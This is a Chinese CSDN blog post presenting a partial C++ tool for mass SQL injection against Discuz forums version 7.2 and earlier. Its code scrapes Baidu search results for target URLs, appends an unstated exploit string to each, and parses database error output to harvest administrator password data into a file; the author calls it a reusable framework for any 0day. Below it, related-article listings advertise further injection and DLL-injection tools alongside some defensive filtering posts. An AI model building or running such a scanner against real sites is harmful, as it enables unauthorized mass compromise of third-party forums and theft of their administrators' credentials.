c++写的discuz<=7.2 SQL注入漏洞,批量注入工具

最新推荐文章于 2022-03-29 11:04:41 发布
最新推荐文章于 2022-03-29 11:04:41 发布
阅读量924 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012187684/article/details/38562273
版权
1、得到百度搜索的结果
        for (nBaiDuPage=100;nBaiDuPage<200;nBaiDuPage++)
        {
                //int 转换成string
                sprintf(tmpChar,"%d",nBaiDuPage);
                tmpStr=tmpChar;
                tmpStr=sUrlFromBaiDu+tmpStr;
                GetResult("date.html","result.txt","\"g\">",
                        "/",tmpStr);
2、读出链接,实现访问并得到返回的信息,注意,是报错的返回结果
3、循环测试,找到特征字符,有则读出并保存
测试主要源码
        while(fgets(buf,255,fResult))//
        {
        
                FILE *fp = fopen("tmp.txt", "w");        // 
                sUrlFromResult=buf;
                nRN=sUrlFromResult.find("\r\n",0);
                if (nRN>0)
                {
                        sUrlFromResult=sUrlFromResult.substr(0,nRN);
                }
                
                sUrl=sUrlHeader+sUrlFromResult+sOday;
                cout<<"测试第"<<jishu<<"个链接"<<"\r\n";
                   .....
                       nret=sBuffer.find("Duplicate ",0);
                
                        if (nret>0)
                        {
                                cout<<"GoodJob!";
                                cout<<"\r\n";
                                nlast=sBuffer.find("'",nret+20);
                                substrTmp=sBuffer.substr(nret+17,nlast-nret-17);
                                fUrlAdminPwd<<sUrlFromResult.c_str();
                                fUrlAdminPwd<<"   result:";
                                fUrlAdminPwd<<substrTmp.c_str();
                                fUrlAdminPwd<<"\r\n";
                                fUrlAdminPwd.flush();
                        }
                }


        
        } 
运行效果


这个写的是个框架,我们可以随意改变0day就可以实现该0day的批量工具,所以只给出了思路,没有全部放出源码。
陈刚12
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
超级SQL注入工具V1.0正式版源码
03-31
C# vs2015开发 官方下载地址: http://www.shack2.org/article/1417357815.html 简介: 超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具。 超级SQL注入工具支持自动识别SQL注入,并自动配置,如程序无法自动识别,还可人工干预识别注入,并标记注入位置。 超级SQL注入工具支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具支持Bool型盲注、错误显示注入、Union注入等方式获取数据。 超级SQL注入工具支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具支持手动灵活的进行SQL注入绕过,可自定义进行字符替换等绕过注入防护。 本工具为渗透测试人员、信息安全工程师等掌握SQL注入技能的人员设计,需要使用人员对SQL注入有一定了解。 工具特点: 1.支持任意地点出现的任意SQL注入 2.支持全自动识别注入标记,也可人工识别注入并标记。 3.支持各种语言环境。大多数注入工具在盲注下,无法获取中文等多字节编码字符内容,本工具可完美解决。 4.支持注入数据发包记录。让你了解程序是如何注入,有助于快速学习和找出注入问题。 5.依靠关键字进行盲注,可通过HTTP相应状态码判断,还可以通过关键字取反功能,反过来取关键字。
c++网络编程基础知识总结
qq_48243698的博客
03-15 1424
TCP/IP网络通信的API(应用程序接口)。称为Socket接口(套接字)。SOCKET接口是TCP/IP网络最为通用的API。 SOCKET实际在计算机中提供了一个通信端口,可以通过这个端口与任何一个具有SOCKET接口的计算机通信。 应用程序在网络上传输,接收的信息都通过这个SOCKET接口来实现。 Socket可以支持数据的发送和接收 它定义一种称为套接字的变量,发送数据时首先创建套接字,然后使用该套接字的sendto等方法对准某个IP/端口进行数据发送 接收端也首先创建套接字,然后将该套
c语言sql注入,C/C++知识点之[C++]简单的SQL注入过滤
weixin_33980343的博客
05-24 691
本文主要向大家介绍了 C/C++知识点之[C++]简单的SQL注入过滤,通过具体的内容向大家展示,希望对大家学习C/C++知识点有所帮助。前几天帮一个客户了一个C++连接MySQL,当他用到他的游戏中后,被人注射了,用了一个永真式,无限的刷了游戏装备所以,我针对参数和整体SQL语句了两个简单的函数,进行简单的过滤boolCheckSQL(stringsql){stringkey[9]=...
c/c++ sql注入
qixiang2013的专栏
03-29 1606
MySQL 支持两种转义模式: ANSI_QUOTESSQL 模式,以及关闭此功能的模式,我们称之为 MySQL模式。 ANSI SQL模式:简单地用(两个单勾)编码所有'(单勾)字符'' MySQL模式,请执行以下操作: NUL (0x00) --> \0 [This is a zero, not the letter O] BS (0x08) --> \b TAB (0x09) --> \t LF (0x0a) --> \n CR (0x0d) -->
如何编一个SQL注入工具
08-03 1228
0x01  前言   一直在思考如何编一个自动化注入工具,这款工具不用太复杂,但是可以用最简单、最直接的方式来获取数据库信息,根据自定义构造的payload来绕过防护,这样子就可以。 0x02 SQL注入工具 A、联合查询 union select 实现起来最为简单,报错注入的实现方式也基本一致,主要思路:获取所有数据库名--选择数据库--查看这个数据库下所有表---选择表--...
有效防止SQL注入的5种方法总结
09-09
SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无帐号登录,甚至篡改数据库。下面这篇文章主要给大家介绍了关于防止SQL注入的5种方法,...
驱动注入,驱动注入工具,C,C++
09-10
驱动注入器源码 驱动级注入 支持win10 win7 32位64位
基于C++线程注入工具(练手版)
02-04
工具分为两部分:DllInject(动态库)和Inject(实现),代码是在VS2019编程环境下编译,项目包中包含完成的解决方案,下载后直接加载运行即可,非常适合初学者练手和熟悉相关线程知识。注:编程不易,谢谢打赏!
x86,x64 汇编代码注入器 C,C++
04-15
32位64位 汇编代码注入器测试版Release,后续更新请关注 郁金香灬老师 Q 150330575
C++ MFC的Dll注入工具源码,包含八种注入方式
09-26
基于MFC,Dll注入工具,包含八种注入方式
极光-SQL注入
11-08
极光-SQL注入
注入调试工具源码
09-10
注入调试,学习面向对象编程入门。适合初级者学习
[C++]简单的SQL注入过滤
weixin_30478619的博客
03-29 1212
前几天帮一个客户了一个C++连接MySQL,当他用到他的游戏中后,被人注射了,用了一个永真式,无限的刷了游戏装备 所以,我针对参数和整体SQL语句了两个简单的函数,进行简单的过滤 bool CheckSQL(string sql) { string key[9] = { "%","/","union","|","&","^" ,"#","/*","*/"}; ...
C++通用漏洞汇总
thesum的专栏
04-07 938
http://cwe.mitre.org/data/lists/659.html
infrared-remote-candroid studiodemo
05-05
android studio下载
【新质生产力】新质生产力赋能智能制造数字化解决方案.pptx
05-05
【新质生产力】新质生产力赋能智能制造数字化解决方案.pptx
基于matlab实现的用于应用布格重力异常数据反演地下异常密度体.rar
05-05
基于matlab实现的用于应用布格重力异常数据反演地下异常密度体.rar
node-v8.10.0-linux-x64.tar.xz
最新发布
05-05
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
C++中代码a<=b<=c是什么意思
06-09
C++中,代码`a<=b<=c`实际上是两个比较运算符的组合,即`a<=b`和`b<=c`。这两个比较运算符的结果都是一个布尔值(`true`或`false`),表示`a`与`b`、`b`与`c`是否满足小于等于关系。 具体来说,当`a`小于等于`b`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值